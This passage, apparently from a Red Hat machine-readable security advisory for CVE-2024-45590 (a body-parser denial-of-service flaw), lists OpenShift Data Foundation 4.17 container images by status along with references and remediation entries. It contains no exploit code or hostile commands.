"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", 